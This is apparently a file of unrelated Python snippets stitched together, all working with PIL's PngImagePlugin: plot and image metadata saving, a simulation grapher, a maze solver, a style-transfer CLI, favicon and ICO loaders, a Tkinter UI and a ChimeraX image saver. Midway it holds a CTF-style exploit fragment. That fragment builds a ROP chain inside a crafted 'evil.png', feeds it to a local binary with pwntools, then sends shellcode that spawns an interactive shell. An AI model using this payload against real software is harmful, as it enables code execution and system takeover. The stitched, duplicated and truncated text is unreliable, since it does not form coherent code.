            fig_fname_image = os.path.join(filepath,
                                           filename)[:-4] + '_fig.png'
            plotfig.savefig(fig_fname_image, bbox_inches='tight',
                            pad_inches=0.05)

            # Use Pillow (an fork for PIL) to attach metadata to the PNG
            png_image = Image.open(fig_fname_image)
            png_metadata = PngImagePlugin.PngInfo()

            # PIL can only handle Strings, so let's convert our times
            metadata['CreationDate'] = metadata['CreationDate'].strftime(
                '%Y%m%d-%H%M-%S')
            metadata['ModDate'] = metadata['ModDate'].strftime(
                '%Y%m%d-%H%M-%S')

            for x in metadata:
                # make sure every value of the metadata is a string
                if not isinstance(metadata[x], str):
                    metadata[x] = str(metadata[x])

                # add the metadata to the picture
                png_metadata.add_text(x, metadata[x])

            # save the picture again, this time including the metadata
            png_image.save(fig_fname_image, "png", pnginfo=png_metadata)
            self.log.info(f'Image saved to: \n{fig_fname_image}')

        # close matplotlib figure
        plt.close(plotfig)
def chunk(cid, *data):
    """Serialise one PNG chunk (id *cid*, payload *data*) and return its bytes."""
    buffer = BytesIO()
    # Equivalent to putchunk(*(buffer, cid) + data), just spelled plainly.
    PngImagePlugin.putchunk(buffer, cid, *data)
    return buffer.getvalue()
def chunk(cid, *data):
    """
    Serialise one PNG chunk and return its raw bytes.

    cid  -- four-byte chunk id (e.g. b'tEXt').
    data -- payload parts forwarded to PngImagePlugin.putchunk.
    """
    # Renamed the local from `file` (shadows the Python 2 builtin) and
    # replaced the obscure tuple-splat call with a direct argument list.
    out = BytesIO()
    PngImagePlugin.putchunk(out, cid, *data)
    return out.getvalue()
def graph(self, info: str = None, output=("plt", "excel")) -> str:
    """
    Graph the recorded statistics in a plt plot, in an excel spreadsheet or
    in an ssps compatible file.

    Args:
        output (Tuple[str]): the output formats to use.
        info(str): Additional notes for the plt plot. If None is passed the
            function will ask via input so if you don't want info, pass an
            empty string.

    Returns:
        str: folder name for output
    """
    compatible_out = ["plt", "excel", "spss"]
    e = False
    # Warn about (but do not fail on) unsupported output formats.
    for ro in output:
        if ro not in compatible_out:
            e = True
            print(
                "WARNING, output format {} is not supported, it will be skipped"
                .format(ro))
    if e:
        print("We currently support " + str(compatible_out))
    if info is None:
        info = input("Enter additional information about the sim: ")
    titles = [
        "Number Of Agents", "Average Agent Mass", "Amount of Food Consumed",
        "Average Agent IQ", "Average Agent EQ",
        "Average breeding mass divider", "Average Agent Breed Chance",
        "Fight count relative to population size",
        "Help count relative to population size",
        "Ignore count relative to population size", "Number of groups",
        "Close family ration in group"
    ]
    # NOTE(review): `self.iq_OT` appears twice below, yet the matching titles
    # are "Average Agent IQ" and "Average Agent EQ" — the EQ series likely
    # plots the wrong attribute. Confirm against the class's recorded fields.
    values = [
        self.number_of_agents_OT, self.mass_OT, self.eat_OT, self.iq_OT,
        self.iq_OT, self.breed_mass_div_OT, self.breed_chance_OT,
        self.fight_OT, self.help_OT, self.nothing_OT,
        self.relative_groups_OT, self.close_family_in_group_OT
    ]
    extention = "png"
    fn = "graphs-0.3/" + self.get_fn()
    os.mkdir(fn)
    try:
        if "plt" in output:
            if len(titles) != len(values):
                raise Exception(
                    "Error len of titles must match len of vars")
            # One stacked subplot per statistic, sharing the x axis.
            fig, axs = plt.subplots(len(values),
                                    sharex='all',
                                    figsize=(20, 60))
            metadata = dict()
            for i in range(len(values)):
                axs[i].plot(self.i_OT, values[i], linewidth=0.25)
                axs[i].axes.set_ylim([0, max(values[i])])
                axs[i].set_ylabel(titles[i])
                metadata["Final" + titles[i]] = values[i][-1]
            axs[0].axes.set_xlim([0, self.dataPoints])
            axs[0].set_title(
                "Simulation with {} initial agents and {} steps\nDate: {}\nNotes: {}\n\nStats:\n{}\n"
                .format(len(self.agents), self.gcsteps,
                        time.strftime("%D"), info, self.stats()),
            )
            axs[-1].set_xlabel("Number Of Data Points")
            plt.tight_layout()
            plt.autoscale()
            pltfn = fn + "/plt." + extention
            fig.savefig(pltfn, bbox_inches='tight')  # save graph
            # add metadata: re-save the PNG with the final values embedded.
            im = Image.open(pltfn)
            meta = PngImagePlugin.PngInfo()
            for x in metadata:
                meta.add_text(x, str(metadata[x]))
            im.save(pltfn, extention, pnginfo=meta)
    # NOTE(review): bare except silently swallows all errors (including
    # KeyboardInterrupt); narrowing to `except Exception` would be safer.
    except:
        print("error in generating plt file")
    # Transpose the per-statistic series into per-row records for export.
    transposed_data = []
    for i in range(self.dataPoints):
        transposed_data.append([j[i] for j in values])
    try:
        if "excel" in output:
            # Excel hard-limits worksheets to 1048576 rows.
            if len(values[0]) > 1048576:
                print("to manny data points, skipping excel")
            else:
                wb = openpyxl.Workbook(write_only=True)
                sheet = wb.create_sheet()
                sheet.append(titles)
                for i in transposed_data:
                    sheet.append(i)
                wb.save(fn + "/excel.xlsx")
    except:
        print("error in generating excel file")
    if "spss" in output:
        savFileName = fn + '/spss.sav'
        # SPSS variable names cannot contain spaces.
        varNames = [i.replace(" ", "_") for i in titles]
        varTypes = dict()
        for t in varNames:
            varTypes[t] = 0
        with savReaderWriter.SavWriter(savFileName, varNames,
                                       varTypes) as writer:
            for i in range(self.dataPoints):
                writer.writerow(transposed_data[i])
    return os.getcwd() + "\\" + fn.replace("/", "\\")
def level_24():
    """
    Solve the maze in 'maze.png' with A*, draw the found path into
    'maze_showpath.png', and dump every second path pixel's red value
    into 'maze_1.zip'. (Python Challenge level 24.)
    """
    class Node:
        # One search node: position, parent link, packed hash, g/h costs.
        def __init__(self, parent, x, y, h):
            self.parent = parent
            self.x, self.y = x, y
            # Pack (x, y) into a single int for cheap hashing/equality.
            self.hv = (x << 16) ^ y
            self.g, self.h = 0, h

        def __repr__(self):
            return '(%d,%d)' % (self.x, self.y)

        def __eq__(self, other):
            # Compares the packed value directly, so a Node equals the raw
            # int (x << 16) ^ y — this is what inCloseList relies on.
            return self.hv == other

        def __hash__(self):
            return self.hv

    class AStarTest:
        def __init__(self, map_max_x, map_max_y, map):
            self.openlist, self.closedlist = [], set()
            self.mapMaxX, self.mapMaxY = map_max_x, map_max_y
            print('%d %d' % (self.mapMaxX, self.mapMaxY))
            self.map = map

        def inCloseList(self, x, y):
            """Check whether (x, y) is in the closed list."""
            return (x << 16) ^ y in self.closedlist

        def inOpenList(self, x, y):
            """Return the open-list index of (x, y), or -1 if absent."""
            for i, n in enumerate(self.openlist):
                if n.x == x and n.y == y:
                    return i
            return -1

        def showPath(self, l, showmark):
            """Render the path and dump alternate path pixels to a zip file."""
            tm = []  # list of (x, y) coordinates from start to goal
            for i in l:
                tm.append((i.x, i.y))
            if showmark:
                # Draw the path onto a copy of the maze image.
                f = PngImagePlugin.PngImageFile(r'maze.png')
                my = f.copy()
                draw = ImageDraw.Draw(my)
                draw.point(tm, showmark)  # (0,0,255,255))
                my.save(r'maze_showpath.png', 'png')
            # Save the r value of every other pixel along the path to a zip file.
            f = PngImagePlugin.PngImageFile(r'maze.png')
            fo = open(r'maze_1.zip', 'wb')
            data = []
            for i in tm[1::2]:  # start from the second pixel, take every other
                r, dummy, dummy, dummy = f.getpixel(i)
                data.append(r)
            import array
            # NOTE(review): array.tostring() was removed in Python 3.9 —
            # tobytes() is the modern equivalent.
            data = array.array("B", data).tostring()
            fo.write(data)
            fo.close()

        def SubNode(self, node, to_x, to_y):
            """Yield the valid (walkable, not-yet-closed) neighbours of node."""
            subList = [(node.x, node.y - 1),
                       (node.x - 1, node.y),
                       (node.x + 1, node.y),
                       (node.x, node.y + 1), ]
            for x, y in subList:
                if self.map[y][x] != '#':  # coordinate is walkable
                    if not self.inCloseList(x, y):  # not already expanded
                        # h = Euclidean distance to goal, inflated by 1.2.
                        item = Node(node, x, y,
                                    math.sqrt((x - to_x) * (x - to_x) +
                                              (y - to_y) * (y - to_y)) * 1.2)
                        item.g = item.parent.g + 1.0
                        yield item

        def getPath(self, from_x, from_y, to_x, to_y, show_mark=None):
            """Find a path between two points.

            from_x, from_y -- start coordinate
            to_x, to_y     -- goal coordinate
            show_mark      -- color used to draw the path (None to skip)
            """
            print("(%d,%d)->(%d,%d)" % (from_x, from_y, to_x, to_y))
            self.openlist.append(Node(None, from_x, from_y, 0))
            while self.openlist:
                # Repeat the following:
                # a) Find the open-list square with the lowest F; call it the
                #    current square.
                minf, minidx, curCoord = 1000000, -1, None  # sentinel best-F
                for i, n in enumerate(self.openlist):
                    if n.g + n.h < minf:
                        minf = n.g + n.h
                        curCoord = n
                        minidx = i
                # b) Move it to the closed list.
                del self.openlist[minidx]
                self.closedlist.add(curCoord)
                # c) For each reachable neighbour of the current square:
                for item in self.SubNode(curCoord, to_x, to_y):
                    # If it is not in the open list, add it with the current
                    # square as its parent and record its F, G and H values.
                    i = self.inOpenList(item.x, item.y)
                    if i == -1:
                        self.openlist.append(item)
                        # Save the path: walk parent links from the goal back
                        # to the start, then reverse.
                        if item.x == to_x and item.y == to_y:
                            print("found %d,len(closedlist)=%d" % (item.g, len(self.closedlist)))
                            l = [item]
                            p = item.parent
                            while p:
                                l.append(p)
                                p = p.parent
                            l.reverse()
                            self.showPath(l, show_mark)
                            return True
                    # If it is already in the open list, check whether the new
                    # route is better (lower G). If so, re-parent it to the
                    # current square and update its G value.
                    else:
                        if item.g < self.openlist[i].g:
                            self.openlist[i].parent = curCoord
                            self.openlist[i].g = item.g
            print("no path found!")
            return False

    # Prepare the map data: convert maze.png into a list of row strings.
    f = PngImagePlugin.PngImageFile(r'maze.png')
    m, line = [], []
    for y in range(f.size[1]):
        for x in range(f.size[0]):
            if f.getpixel((x, y)) == (255, 255, 255, 255):
                line.append('#')  # white pixels are walls
            else:
                line.append('.')  # everything else is walkable
        m.append(''.join(line))
        del line[:]
    # Run the A* search across the maze.
    t = AStarTest(len(m[0]), len(m), m)
    t.getPath(639, 0, 1, 640, (0, 0, 255, 255))
def main():
    """CLI interface for style transfer.

    Parses arguments into the module-global ARGS, loads the Caffe model and
    input images, starts an HTTP progress server, runs the multiscale style
    transfer, and finally writes the output PNG with an iTXt comment.
    """
    global ARGS, RUN, STATS
    ARGS = parse_args(STATE)
    setup_exceptions()
    print_args()
    start_time = timer()

    # Run identifier: YYMMDD_HHMMSS, used for logging and default filenames.
    now = datetime.now()
    RUN = '%02d%02d%02d_%02d%02d%02d' % \
        (now.year % 100, now.month, now.day, now.hour, now.minute, now.second)
    STATS = StatLogger()
    print_('Run %s started.' % RUN)
    if MKL_THREADS is not None:
        print_('MKL detected, %d threads maximum.' % MKL_THREADS)

    # Silence Caffe's glog output before it is imported.
    os.environ['GLOG_minloglevel'] = '2'
    if ARGS.caffe_path:
        sys.path.append(ARGS.caffe_path + '/python')

    # Known VGG prototxts have precomputed layer shapes; anything else is
    # probed by loading the model once in a child process.
    if Path(ARGS.model).name in ('vgg16.prototxt', 'vgg16_avgpool.prototxt'):
        shapes = VGG16_SHAPES
    elif Path(ARGS.model).name in ('vgg19.prototxt', 'vgg19_avgpool.prototxt'):
        shapes = VGG19_SHAPES
    else:
        print_('Loading %s.' % ARGS.weights)
        resp_q = CTX.Queue()
        CTX.Process(target=init_model,
                    args=(resp_q, ARGS.caffe_path, ARGS.model, ARGS.weights, ARGS.mean)).start()
        shapes = resp_q.get()

    print_('Initializing %s.' % ARGS.weights)
    model = CaffeModel(ARGS.model, ARGS.weights, ARGS.mean, shapes=shapes, placeholder=True)
    transfer = StyleTransfer(model)
    if ARGS.list_layers:
        # Print the layer table and exit without running a transfer.
        print_('Layers:')
        for layer, shape in model.shapes.items():
            print_('% 25s %s' % (layer, shape))
        sys.exit(0)

    # Load content/style images; optional init and auxiliary images.
    content_image = Image.open(ARGS.content_image).convert('RGB')
    style_images = []
    for image in ARGS.style_images:
        style_images.append(Image.open(image).convert('RGB'))
    initial_image, aux_image = None, None
    if ARGS.init_image:
        initial_image = Image.open(ARGS.init_image).convert('RGB')
    if ARGS.aux_image:
        aux_image = Image.open(ARGS.aux_image).convert('RGB')

    # Optional interactive prompt that can adjust parameters mid-run.
    cli, cli_resp = None, None
    if ARGS.prompt:
        cli = prompt.Prompt(RUN, STATE)
        cli_resp = prompt.PromptResponder(cli.q, ARGS)

    # HTTP server that streams progress to a browser.
    server_address = ('', ARGS.port)
    url = 'http://127.0.0.1:%d/' % ARGS.port
    server = ProgressServer(server_address, ProgressHandler)
    server.transfer = transfer
    server.hidpi = ARGS.hidpi
    progress_args = {}
    if ARGS.display == 'browser' and 'no_browser' not in ARGS:
        progress_args['url'] = url
    steps = 0
    server.progress = Progress(transfer, steps=steps, save_every=ARGS.save_every,
                               cli=cli, callback=cli_resp, **progress_args)
    th = threading.Thread(target=server.serve_forever)
    th.daemon = True  # do not block interpreter exit
    th.start()
    print_('\nWatch the progress at: %s\n' % url)

    np.random.seed(ARGS.seed)
    try:
        transfer.transfer_multiscale([content_image], style_images, initial_image,
                                     aux_image, callback=server.progress)
    except (EOFError, KeyboardInterrupt):
        # Ctrl-C / closed stdin ends the run gracefully.
        print_()
    finally:
        if ARGS.prompt:
            cli.stop()

    STATS.dump()
    if transfer.current_output:
        output_image = ARGS.output_image
        if not output_image:
            output_image = RUN + '_out.png'
        print_('Saving output as %s.' % output_image)
        # Embed the run parameters as an iTXt comment in the PNG.
        png_info = PngImagePlugin.PngInfo()
        png_info.add_itxt('Comment', get_image_comment())
        transfer.current_output.save(output_image, pnginfo=png_info)
    time_spent = timer() - start_time
    print_('Run %s ending after %dm %.3fs.' % (RUN, time_spent // 60, time_spent % 60))
class IconImporter(object):
    """Fetch, normalize and persist a feed's favicon.

    NOTE(review): Python 2 code (`except Exception, e`, `xrange`,
    `str.decode('base64')`) — not Python 3 compatible as written.
    """

    def __init__(self, feed, page_data=None, force=False):
        self.feed = feed
        self.force = force          # bypass the "already found" short-circuits
        self.page_data = page_data  # optional pre-fetched page HTML
        self.feed_icon = MFeedIcon.get_feed(feed_id=self.feed.pk)

    def save(self):
        """Fetch the feed's icon, store it (and optionally to S3).

        Returns True when a favicon is recorded for the feed, or None when
        the fetch was skipped early.
        """
        # Skip feeds already known to have no favicon, unless forced.
        if not self.force and self.feed.favicon_not_found:
            # print 'Not found, skipping...'
            return
        # Skip feeds whose icon is already fetched and mirrored to S3.
        if (not self.force and not self.feed.favicon_not_found and
                self.feed_icon.icon_url and self.feed.s3_icon):
            # print 'Found, but skipping...'
            return
        if 'facebook.com' in self.feed.feed_address:
            image, image_file, icon_url = self.fetch_facebook_image()
        else:
            image, image_file, icon_url = self.fetch_image_from_page_data()
        if not image:
            image, image_file, icon_url = self.fetch_image_from_path(force=self.force)
        if image:
            image = self.normalize_image(image)
            try:
                color = self.determine_dominant_color_in_image(image)
            except IndexError:
                return
            except MemoryError:
                return
            try:
                image_str = self.string_from_image(image)
            except TypeError:
                return

            # Refuse oversized icons (> ~500 KB encoded).
            if len(image_str) > 500000:
                image = None
            # Persist only when something actually changed (or when forced,
            # or when the S3 mirror is missing).
            if (image and
                (self.force or
                 self.feed_icon.data != image_str or
                 self.feed_icon.icon_url != icon_url or
                 self.feed_icon.not_found or
                 (settings.BACKED_BY_AWS.get('icons_on_s3') and not self.feed.s3_icon))):
                logging.debug(" ---> [%-30s] ~SN~FBIcon difference:~FY color:%s (%s/%s) data:%s url:%s notfound:%s no-s3:%s" % (
                    self.feed.log_title[:30],
                    self.feed_icon.color != color, self.feed_icon.color, color,
                    self.feed_icon.data != image_str,
                    self.feed_icon.icon_url != icon_url,
                    self.feed_icon.not_found,
                    settings.BACKED_BY_AWS.get('icons_on_s3') and not self.feed.s3_icon))
                self.feed_icon.data = image_str
                self.feed_icon.icon_url = icon_url
                self.feed_icon.color = color
                self.feed_icon.not_found = False
                self.feed_icon.save()
                if settings.BACKED_BY_AWS.get('icons_on_s3'):
                    self.save_to_s3(image_str)
            # Keep the denormalized color on the Feed row in sync.
            if self.feed.favicon_color != color:
                self.feed.favicon_color = color
                self.feed.favicon_not_found = False
                self.feed.save(update_fields=['favicon_color', 'favicon_not_found'])
        if not image:
            # Remember the failure so future runs can skip the fetch.
            self.feed_icon.not_found = True
            self.feed_icon.save()
            self.feed.favicon_not_found = True
            self.feed.save()
        return not self.feed.favicon_not_found

    def save_to_s3(self, image_str):
        """Upload the base64-encoded icon to S3 as a public PNG."""
        # 60-day HTTP Expires header for CDN caching.
        expires = datetime.datetime.now() + datetime.timedelta(days=60)
        expires = expires.strftime("%a, %d %b %Y %H:%M:%S GMT")
        k = Key(settings.S3_CONN.get_bucket(settings.S3_ICONS_BUCKET_NAME))
        k.key = self.feed.s3_icons_key
        k.set_metadata('Content-Type', 'image/png')
        k.set_metadata('Expires', expires)
        k.set_contents_from_string(image_str.decode('base64'))
        k.set_acl('public-read')
        self.feed.s3_icon = True
        self.feed.save()

    def load_icon(self, image_file, index=None):
        '''
        DEPRECATED

        Load Windows ICO image.

        See http://en.wikipedia.org/w/index.php?oldid=264332061 for file
        format description.

        Cribbed and modified from http://djangosnippets.org/snippets/1287/

        image_file -- seekable binary file object containing the .ico data
        index      -- optional icon-directory index; None selects the
                      "best" (largest) icon

        Returns a PIL image (RGBA for masked bitmaps) or None on any
        parse failure.
        '''
        try:
            image_file.seek(0)
            header = struct.unpack('<3H', image_file.read(6))
        except Exception, e:
            return

        # Check magic: reserved word 0, type 1 (icon).
        if header[:2] != (0, 1):
            return

        # Collect icon directories; header[2] is the image count.
        directories = []
        for i in xrange(header[2]):
            directory = list(struct.unpack('<4B2H2I', image_file.read(16)))
            for j in xrange(3):
                # Width/height/palette of 0 means 256 in the ICO format.
                if not directory[j]:
                    directory[j] = 256
            directories.append(directory)

        if index is None:
            # Select best icon: max by (width, height, palette) tuple.
            directory = max(directories, key=operator.itemgetter(slice(0, 3)))
        else:
            directory = directories[index]

        # Seek to the bitmap data; directory[7] is the data offset.
        image_file.seek(directory[7])
        prefix = image_file.read(16)
        image_file.seek(-16, 1)

        if PngImagePlugin._accept(prefix):
            # Windows Vista icon with PNG inside
            try:
                image = PngImagePlugin.PngImageFile(image_file)
            except IOError:
                return
        else:
            # Load XOR bitmap
            try:
                image = BmpImagePlugin.DibImageFile(image_file)
            except IOError:
                return
            if image.mode == 'RGBA':
                # Windows XP 32-bit color depth icon without AND bitmap
                pass
            else:
                # Patch up the bitmap height: the DIB header counts both the
                # XOR and AND bitmaps, so halve it.
                image.size = image.size[0], image.size[1] >> 1
                d, e, o, a = image.tile[0]
                image.tile[0] = d, (0, 0) + image.size, o, a

                # Calculate AND bitmap dimensions. See
                # http://en.wikipedia.org/w/index.php?oldid=264236948#Pixel_storage
                # for description
                offset = o + a[1] * image.size[1]
                stride = ((image.size[0] + 31) >> 5) << 2  # rows padded to 32 bits
                size = stride * image.size[1]

                # Load AND bitmap and apply it as the alpha channel.
                image_file.seek(offset)
                string = image_file.read(size)
                mask = Image.frombytes('1', image.size, string, 'raw',
                                       ('1;I', stride, -1))
                image = image.convert('RGBA')
                image.putalpha(mask)
        return image
def load_icon(_imgPath, index=None): if isinstance(_imgPath, basestring): file = open(_imgPath, 'rb') try: header = struct.unpack('<3H', file.read(6)) except: raise IOError('Not an ICO file') # Check magic try: if header[:2] != (0, 1): raise IOError('Not an ICO file') except: return loadPNG(_imgPath) # Collect icon directories directories = [] for i in xrange(header[2]): directory = list(struct.unpack('<4B2H2I', file.read(16))) for j in xrange(3): if not directory[j]: directory[j] = 256 directories.append(directory) if index is None: # Select best icon directory = max(directories, key=operator.itemgetter(slice(0, 3))) else: directory = directories[index] # Seek to the bitmap data file.seek(directory[7]) prefix = file.read(16) file.seek(-16, 1) if PngImagePlugin._accept(prefix): # Windows Vista icon with PNG inside image = PngImagePlugin.PngImageFile(file) else: # Load XOR bitmap image = BmpImagePlugin.DibImageFile(file) if image.mode == 'RGBA': # Windows XP 32-bit color depth icon without AND bitmap pass else: # Patch up the bitmap height image.size = image.size[0], image.size[1] >> 1 d, e, o, a = image.tile[0] image.tile[0] = d, (0, 0) + image.size, o, a # Calculate AND bitmap dimensions. See offset = o + a[1] * image.size[1] stride = ((image.size[0] + 31) >> 5) << 2 size = stride * image.size[1] # Load AND bitmap file.seek(offset) string = file.read(size) mask = Image.frombytes('1', image.size, string, 'raw', ('1;I', stride, -1)) image = image.convert('RGBA') image.putalpha(mask) return image, image.size
syscall """).ljust(0x10, '\x00') shell = u64(x[:8]) shell8 = u64(x[8:]) payload = "\x00" * 0x1ff638 + flat( 0x405c54, 0xa, 0x401ad8, 0x412000, 0x404985, 0x1000, 0x4123e5, 0x7, 0x40a7c5, 0x403eeb, 0x412c36, 0x405c54, shell, 0x04084cc, 0, 0x403eeb, 0x412c36 + 8, 0x405c54, shell8, 0x04084cc, 0, 0x405c54, 0x3c, 0x40a7c5) print len(payload) < h * w * 4 payload = map(ord, payload.ljust(h * w * 4, '\x00')) data = np.asarray(payload, dtype=np.uint8).reshape((h, w, 4)) img = Image.fromarray(data, 'RGBA') info = PngImagePlugin.PngInfo() info.add_text("TXT", "VALUE") img.save('evil.png', pnginfo=info) r = process(["./png2a"]) IMAGE = 'evil.png' data = open(IMAGE).read() r.send(p32(len(data)) + p32(4 * 53) + p32(0x9a9)) r.recvrepeat(2) r.send(data) r.recvrepeat(2) r.send(p64(0x412c36)) r.recvrepeat(2) r.send("\x90" * 0x30 + asm(shellcraft.sh())) r.interactive()
def createWidgets(self):
    """Build the Tkinter UI: title bar (fm1), entry/button rows plus the
    next-video button (fm2), and the video display panel (fm3)."""
    # fm1: title banner
    self.fm1 = Frame(self, bg='black')
    self.titleLabel = Label(self.fm1, text="testing system",
                            font=('微软雅黑', 64), fg="white", bg='black')
    self.titleLabel.pack()
    self.fm1.pack(side=TOP, expand=YES, fill='x', pady=20)

    # fm2: left side holds the predict/ground-truth rows, right side the
    # next-video button.
    self.fm2 = Frame(self, bg='black')
    self.fm2_left = Frame(self.fm2, bg='black')
    self.fm2_right = Frame(self.fm2, bg='black')
    self.fm2_left_top = Frame(self.fm2_left, bg='black')
    self.fm2_left_bottom = Frame(self.fm2_left, bg='black')
    self.predictEntry = Entry(self.fm2_left_top, font=('微软雅黑', 24),
                              width='72', fg='#FF4081')
    self.predictButton = Button(self.fm2_left_top, text='predict sentence',
                                bg='#FF4081', fg='white', font=('微软雅黑', 36),
                                width='16', command=self.output_predict_sentence)
    self.predictButton.pack(side=LEFT)
    self.predictEntry.pack(side=LEFT, fill='y', padx=20)
    self.fm2_left_top.pack(side=TOP, fill='x')
    self.truthEntry = Entry(self.fm2_left_bottom, font=('微软雅黑', 24),
                            width='72', fg='#22C9C9')
    self.truthButton = Button(self.fm2_left_bottom, text='ground truth',
                              bg='#22C9C9', fg='white', font=('微软雅黑', 36),
                              width='16', command=self.output_ground_truth)
    self.truthButton.pack(side=LEFT)
    self.truthEntry.pack(side=LEFT, fill='y', padx=20)
    self.fm2_left_bottom.pack(side=TOP, pady=10, fill='x')
    self.fm2_left.pack(side=LEFT, padx=60, pady=20, expand=YES, fill='x')
    # self.nextVideoImg= ImageTk.PhotoImage(file = '/home/hl/Desktop/lovelyqian/nextVideo.png')
    self.nextVideoButton = Button(self.fm2_right, image='', text='next video',
                                  bg='black', command=self.start_play_video_thread)
    self.nextVideoButton.pack(expand=YES, fill=BOTH)
    self.fm2_right.pack(side=RIGHT, padx=60)
    self.fm2.pack(side=TOP, expand=YES, fill="x")

    # fm3: initial image panel.
    # NOTE(review): `load` is assigned but never used, and
    # PngImagePlugin.PngImageFile takes `fp`, not `file`; a Tk Label also
    # normally needs an ImageTk.PhotoImage, not a PIL image — confirm this
    # code path actually runs.
    self.fm3 = Frame(self, bg='black')
    load = Image.open('/home/jun/Firefox_wallpaper.png')
    initIamge = PngImagePlugin.PngImageFile(
        file='/home/jun/Firefox_wallpaper.png')  #ImageTk.PhotoImage(load)
    self.panel = Label(self.fm3, image=initIamge)
    # Keep a reference so the image is not garbage-collected by Tk.
    self.panel.image = initIamge
    self.panel.pack()
    self.fm3.pack(side=TOP, expand=YES, fill=BOTH, pady=10)
def save_image(session, path, format_name, width=None, height=None,
               supersample=3, pixel_size=None, transparent_background=False,
               quality=95):
    '''
    Save an image of the current graphics window contents.

    session                -- ChimeraX session; its main_view is rendered
    path                   -- output file path (directory must exist)
    format_name            -- 'PNG', 'TIFF' or 'JPEG' (passed to PIL)
    width, height          -- optional image size in pixels
    pixel_size             -- optional physical size per pixel; mutually
                              exclusive with width/height
    supersample            -- antialiasing factor for the render
    transparent_background -- render with transparent background
    quality                -- JPEG quality (ignored for other formats)

    Raises UserError for invalid arguments or unwritable paths, and
    LimitationError when OpenGL rendering is unavailable.
    '''
    from chimerax.core.errors import UserError, LimitationError
    has_graphics = session.main_view.render is not None
    if not has_graphics:
        raise LimitationError(
            "Unable to save images because OpenGL rendering is not available")
    from os.path import dirname, exists
    dir = dirname(path)
    if dir and not exists(dir):
        raise UserError('Directory "%s" does not exist' % dir)

    if pixel_size is not None:
        if width is not None or height is not None:
            raise UserError(
                'Cannot specify width or height if pixel_size is given')
        v = session.main_view
        b = v.drawing_bounds()
        if b is None:
            raise UserError(
                'Cannot specify use pixel_size option when nothing is shown')
        # Derive width/height from the ratio of current screen pixel size
        # to the requested physical pixel size.
        psize = v.pixel_size(b.center())
        if psize > 0 and pixel_size > 0:
            f = psize / pixel_size
            w, h = v.window_size
            from math import ceil
            width, height = int(ceil(f * w)), int(ceil(f * h))
        else:
            raise UserError(
                'Pixel size option (%g) and screen pixel size (%g) must be positive'
                % (pixel_size, psize))

    from chimerax.core.session import standard_metadata
    std_metadata = standard_metadata()
    metadata = {}
    if format_name == 'PNG':
        metadata['optimize'] = True
        # if dpi is not None:
        #     metadata['dpi'] = (dpi, dpi)
        # HiDPI (retina) contexts report a pixel scale of 2.
        if session.main_view.render.opengl_context.pixel_scale() == 2:
            metadata['dpi'] = (144, 144)
        from PIL import PngImagePlugin
        pnginfo = PngImagePlugin.PngInfo()
        # tags are from <https://www.w3.org/TR/PNG/#11textinfo>

        def add_text(keyword, value):
            # Latin-1 values fit in a tEXt chunk; anything else needs iTXt.
            try:
                b = value.encode('latin-1')
            except UnicodeEncodeError:
                pnginfo.add_itxt(keyword, value)
            else:
                pnginfo.add_text(keyword, b)
        # add_text('Title', description)
        add_text('Creation Time', std_metadata['created'])
        add_text('Software', std_metadata['generator'])
        add_text('Author', std_metadata['creator'])
        add_text('Copy' 'right', std_metadata['dateCopyrighted'])
        metadata['pnginfo'] = pnginfo
    elif format_name == 'TIFF':
        # metadata['compression'] = 'lzw:2'
        # metadata['description'] = description
        metadata['software'] = std_metadata['generator']
        # TIFF dates are YYYY:MM:DD HH:MM:SS (local timezone)
        import datetime as dt
        metadata['date_time'] = dt.datetime.now().strftime('%Y:%m:%d %H:%M:%S')
        metadata['artist'] = std_metadata['creator']
        # TIFF copyright field is ASCII, so replace the Unicode symbol.
        cp = std_metadata['dateCopyrighted']
        if cp[0] == '\N{COPYRIGHT SIGN}':
            cp = 'Copy' 'right' + cp[1:]
        metadata['copy' 'right'] = cp
        # if units == 'pixels':
        #     dpi = None
        # elif units in ('points', 'inches'):
        #     metadata['resolution unit'] = 'inch'
        #     metadata['x resolution'] = dpi
        #     metadata['y resolution'] = dpi
        # elif units in ('millimeters', 'centimeters'):
        #     adjust = convert['centimeters'] / convert['inches']
        #     dpcm = dpi * adjust
        #     metadata['resolution unit'] = 'cm'
        #     metadata['x resolution'] = dpcm
        #     metadata['y resolution'] = dpcm
    elif format_name == 'JPEG':
        metadata['quality'] = quality
        # if dpi is not None:
        #     # PIL's jpeg_encoder requires integer dpi values
        #     metadata['dpi'] = (int(dpi), int(dpi))
        # TODO: create exif with metadata using piexif package?
        # metadata['exif'] = exif

    view = session.main_view
    view.render.make_current()
    # Refuse sizes the OpenGL framebuffer cannot render.
    max_size = view.render.max_framebuffer_size()
    if max_size and ((width is not None and width > max_size)
                     or (height is not None and height > max_size)):
        raise UserError(
            'Image size %d x %d too large, exceeds maximum OpenGL render buffer size %d'
            % (width, height, max_size))

    i = view.image(width, height, supersample=supersample,
                   transparent_background=transparent_background)
    if i is not None:
        try:
            i.save(path, format_name, **metadata)
        except PermissionError:
            from chimerax.core.errors import UserError
            raise UserError('Permission denied writing file %s' % path)
    else:
        # Rendering failed (e.g. offscreen buffer unavailable); warn only.
        msg = "Unable to save image"
        if width is not None:
            msg += ', width %d' % width
        if height is not None:
            msg += ', height %d' % height
        session.logger.warning(msg)
def save_hdf5_data(self, data_dict, attributes=None, filepath=None,
                   filelabel=None, filename=None, timestamp=None,
                   plotfig=None):
    """
    Function used to save the data in hdf5 format. Data is a dictionary of
    data and metadata. The dictionary key corresponds to the hdf5 file key,
    so it follows a POSIX-style hierarchy with /-separators.

    @param data_dict: A dictionary containing the hdf5 dataset names and the
                      data. The data need to be lists or numpy.ndarray.
    @param attributes: A dictionary containing the dataset attributes, keyed
                       by dataset name. Each attribute item needs to be a
                       dictionary.
    @param filepath: An optional argument to give the name of the filepath.
                     Default is module name.
    @param filelabel: An optional file label. Default is module name.
    @param filename: An optional parameter to set the file name. Default is
                     timestamp + module name.
    @param timestamp: An optional parameter which sets the timestamp.
                      Default is the date-time at saving.
    @param plotfig: an optional matplotlib figure saved alongside the data
                    as PDF and/or PNG (controlled by self.save_pdf /
                    self.save_png).
    """
    start_time = time.time()

    if timestamp is None:
        timestamp = datetime.datetime.now()

    # Try to trace back the function call to the class which was calling it,
    # so the data lands in that module's directory.
    try:
        frm = inspect.stack()[1]
        # this will get the object, which called the save_data function.
        mod = inspect.getmodule(frm[0])
        # that will extract the name of the class.
        module_name = mod.__name__.split('.')[-1]
    except Exception:
        # Sometimes it is not possible to get the caller (such as when
        # calling this from the console).
        module_name = 'UNSPECIFIED'

    # determine proper file path
    if filepath is None:
        filepath = self.get_path_for_module(module_name)
    elif not os.path.exists(filepath):
        os.makedirs(filepath)
        self.log.info('Custom filepath does not exist. Created directory "{0}"'
